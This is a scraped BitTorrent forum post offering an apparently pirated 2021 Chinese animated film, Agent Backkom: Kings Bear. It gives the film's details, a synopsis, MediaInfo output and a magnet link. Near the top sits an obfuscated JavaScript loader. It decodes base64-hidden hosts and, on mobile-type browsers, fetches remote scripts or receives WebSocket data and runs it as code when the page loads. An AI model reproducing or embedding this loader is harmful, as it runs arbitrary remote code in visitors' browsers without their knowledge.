贝肯熊2:金牌特工[国语配音/中文字幕].Agent.Backkom:Kings.Bear.2021.1080p.WEB-DL.H265.DDP5.1 1.83GB

版主小s 27天前 141

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 贝肯熊2:金牌特工 / 特工贝肯熊2 / Agent Backkom:Kings Bear
◎年  代 2021
◎产  地 中国大陆
◎类  别 动画 / 冒险
◎语  言 汉语普通话
◎上映日期 2021-07-23(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣评分 4.9/10 (1923人评价)
◎豆瓣链接 https://movie.douban.com/subject/33437509/
◎片  长 95分钟
◎编  剧 刘珮如 Pei-ju Liu (id:1415891)
       潘依然 Yiran Pan (id:1405343)
       许真 Zhen Xu (id:1433131)

◎标  签 儿童 / 贝肯熊 / 动画 / 喜剧 / 冒险 / 童年 / 2021 / 中国大陆

◎简  介
  拥有超级芯片的特工熊贝肯,梦想成为独当一面的金牌特工,然而特工局并不放心将任务交给一只北极熊去执行。贝肯为了证明自己的能力,贸然执行任务,误入陷阱,却因此失去了宝贵芯片。                                    
                                变成普通北极熊的贝肯立志夺回芯片,却阴差阳错被粉丝小海豹缠上,无奈的他只好带着小海豹踏上寻找芯片的冒险旅程。不过这一切并不如贝肯想象中的顺利,他们需要躲避特工局的追查、闯过丛林伙伴的考验,以及面对拿走芯片的邪恶势力。                                    
                                历经曲折艰辛,在小海豹的鼓励下,贝肯终于找到自己与生俱来的力量,并领悟特工的真谛。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 240902889901657534551192198100454654806 (0xB53C357CC557AA10A6CDE57E1316C356)

  4. Complete name                            : 贝肯熊2:金牌特工.Agent.Backkom:[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.82 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate                         : 2 744 kb/s

  10. Encoded date                             : UTC 2021-08-30 11:47:54

  11. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 35 min

  20. Bit rate                                 : 2 486 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 800 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.067

  30. Stream size                              : 1.65 GiB (91%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio

  34. ID                                       : 2

  35. Format                                   : E-AC-3

  36. Format/Info                              : Enhanced AC-3

  37. Commercial name                          : Dolby Digital Plus

  38. Codec ID                                 : A_EAC3

  39. Duration                                 : 1 h 35 min

  40. Bit rate mode                            : Constant

  41. Bit rate                                 : 256 kb/s

  42. Channel(s)                               : 6 channels

  43. Channel layout                           : L R C LFE Ls Rs

  44. Sampling rate                            : 48.0 kHz

  45. Frame rate                               : 31.250 FPS (1536 SPF)

  46. Compression mode                         : Lossy

  47. Stream size                              : 174 MiB (9%)

  48. Service kind                             : Complete Main

  49. Default                                  : Yes

  50. Forced                                   : No



TAGS 冒险 动画

磁力链:
  • magnet:?xt=urn:btih:E074788D8E2EC1179F5DA5A25DEB6B067E60AE3E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回